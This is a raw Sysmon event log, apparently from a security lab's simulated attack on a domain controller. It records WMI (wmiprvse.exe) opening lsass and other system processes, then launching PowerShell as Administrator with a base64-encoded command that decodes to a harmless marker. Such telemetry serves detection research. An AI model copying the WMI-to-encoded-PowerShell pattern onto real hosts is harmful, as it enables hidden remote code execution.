16:54:43.575{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1400-00000000AD01}1316C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243216Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.575{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1300-00000000AD01}1256C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243215Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.575{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1200-00000000AD01}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243214Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.575{05ADC7E1-6DD3-603E-E1AA-00000000AD01}90044664C:\Windows\system32\conhost.exe{05ADC7E1-6DD3-603E-E0AA-00000000AD01}11056C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243213Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.575{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1100-00000000AD01}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243212Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.575{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1000-00000000AD01}1144C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243211Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.575{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0F00-00000000AD01}1100C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002243210Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.575{05ADC7E1-6DD3-603E-DEAA-00000000AD01}9656ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_lepdxvvb.rbn.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002243209Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.575{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0E00-00000000AD01}1076C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243208Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.575{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0D00-00000000AD01}620C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243207Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.575{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0C00-00000000AD01}588C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243206Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.575{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243205Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.575{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0900-00000000AD01}792C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243204Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.573{05ADC7E1-29F0-6039-C005-00000000AD01}49443952C:\Windows\system32\csrss.exe{05ADC7E1-6DD3-603E-E1AA-00000000AD01}9004C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002243203Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.572{05ADC7E1-229F-6039-1600-00000000AD01}15401672C:\Windows\system32\svchost.exe{05ADC7E1-6DD3-603E-DCAA-00000000AD01}11576C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243202Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.572{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6DD3-603E-DCAA-00000000AD01}11576C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243201Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.569{05ADC7E1-29F0-6039-C005-00000000AD01}49442420C:\Windows\system32\csrss.exe{05ADC7E1-6DD3-603E-E0AA-00000000AD01}11056C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002243200Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.567{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243199Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.567{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243198Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.565{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243197Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.565{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243196Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.565{05ADC7E1-229D-6039-0500-00000000AD01}636752C:\Windows\system32\csrss.exe{05ADC7E1-6DD3-603E-E0AA-00000000AD01}11056C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 23542300x80000000000000002243195Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.564{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AB5B8365C55DC6CAFC01279C43917E95,SHA256=12F46212CD93FFECC4FD21AC6D4B524B047F4569C416E93828E94C84F0D3B3A9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002243194Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.564{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD3-603E-E0AA-00000000AD01}11056C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4 154100x80000000000000002243193Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.564{05ADC7E1-6DD3-603E-E0AA-00000000AD01}11056C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe /NoProfile /EncodedComman VwByAGkAdABlAC0ASABvAHMAdAAgADMAYgA5AGMAMQAwADIAZAAtAGQAYQAxAGUALQA0AGUANgBiAC0AYQBiADkAMAAtADUANABhAGMAZQBjADQAZgBmADIAMQA3AA==C:\Windows\system32\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-6D63-603E-6BAA-00000000AD01}6344C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 11241100x80000000000000002243192Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.545{05ADC7E1-6DD3-603E-DEAA-00000000AD01}9656C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_lepdxvvb.rbn.ps12021-03-02 16:54:43.545 10341000x80000000000000002243191Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 